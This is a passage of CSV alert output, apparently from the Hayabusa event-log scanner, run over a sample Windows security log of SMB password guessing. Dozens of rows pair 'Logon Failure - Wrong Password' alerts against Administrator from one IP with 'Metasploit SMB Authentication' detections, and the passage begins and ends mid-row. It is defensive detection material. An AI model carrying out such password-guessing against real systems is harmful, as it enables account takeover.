Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 